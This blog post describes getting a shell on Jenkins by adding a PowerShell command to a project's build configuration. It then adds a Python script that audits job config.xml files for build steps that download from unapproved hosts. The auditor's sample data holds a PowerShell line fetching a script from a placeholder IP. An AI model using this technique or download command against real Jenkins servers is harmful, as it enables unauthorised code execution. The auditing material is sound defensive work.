
    In a previous post, I wrote about Exploiting Jenkins. So what is Jenkins? "The leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project." My interest in Jenkins is purely from the exploitation side, and my avenue for entry has been through either Metasploit or the Groovy Scripting Console. Like most things hacking, if you really want to learn how to exploit something, you install it, configure it, and deploy it -- you will get a much better understanding of the nuts and bolts. I rarely see Jenkins and I've yet to go down that rabbit hole, and it should come as no surprise then that I discovered another way to get a shell.



    When we get authenticated, we would normally head over to Manage Jenkins:


    And then to Script Console:


    My previous post goes into that.  This time, we're going to enter the project:


    We choose Configure:


    And surprise, we have a different (easier) way to execute commands:


    Executing a little PowerShell to grab a shell from our attacking machine:


    After choosing Save, we choose Schedule a Build for Project.  On the bottom left, we see the status.  This will take a minute before we get execution:


    We're using Python to host the web server with our shell:


    With our handler set up:


    We catch our shell. 

    This is just another avenue to add to the list of tricks.
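
    Seen from the defender's side, the command build step above ends up in the job's config.xml, so job definitions can be audited for steps that fetch from hosts you have not approved. The following is an added example, not code from the original post: the sample configs, job names and the allowlisted host are constructed assumptions, and it generalizes from the PowerShell case to the batch, shell and PowerShell plugin builders.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Builder elements whose <command> text runs verbatim on the build agent.
COMMAND_BUILDERS = {
    "hudson.tasks.BatchFile": "Windows batch",
    "hudson.tasks.Shell": "shell",
    "hudson.plugins.powershell.PowerShell": "PowerShell",
}
ALLOWED_HOSTS = {"artifacts.example.internal"}  # assumption: your approved download hosts
URL_RE = re.compile(r"https?://[^\s'\"()<>|]+", re.IGNORECASE)
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")

def audit_job(name, config_xml, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per URL in a command build step that is off the allowlist."""
    # Jenkins writes an XML 1.1 declaration, which Python's expat parser rejects; drop it.
    root = ET.fromstring(XML_DECL_RE.sub("", config_xml, count=1))
    findings = []
    for elem in root.iter():  # iter() also reaches steps nested inside wrapper builders
        step = COMMAND_BUILDERS.get(elem.tag)
        if step is None:
            continue
        for url in URL_RE.findall(elem.findtext("command") or ""):
            host = (urlparse(url).hostname or "").lower()
            if host not in allowed_hosts:
                findings.append({"job": name, "step": step, "host": host, "url": url})
    return findings

# Constructed sample configs (not from the post); 192.0.2.10 is a documentation address.
SAMPLE_JOBS = {
    "build-app": """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell>
  <command>curl -fsSL https://artifacts.example.internal/tools/lint.tgz -o lint.tgz</command>
</hudson.tasks.Shell></builders></project>""",
    "nightly-report": """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.BatchFile>
  <command>powershell Invoke-WebRequest http://192.0.2.10:8000/file.ps1 -OutFile f.ps1</command>
</hudson.tasks.BatchFile></builders></project>""",
}

def audit_all(jobs):
    """Audit every job in a {name: config.xml text} mapping, in name order."""
    return [f for name, text in sorted(jobs.items()) for f in audit_job(name, text)]

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_JOBS):
        print(finding)
```

    In practice the mapping would be filled from each job's config.xml under the Jenkins home directory, and a finding is a prompt to review who changed that job and when.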



    © 2021 Seven Layer Networks, Inc. | All rights reserved.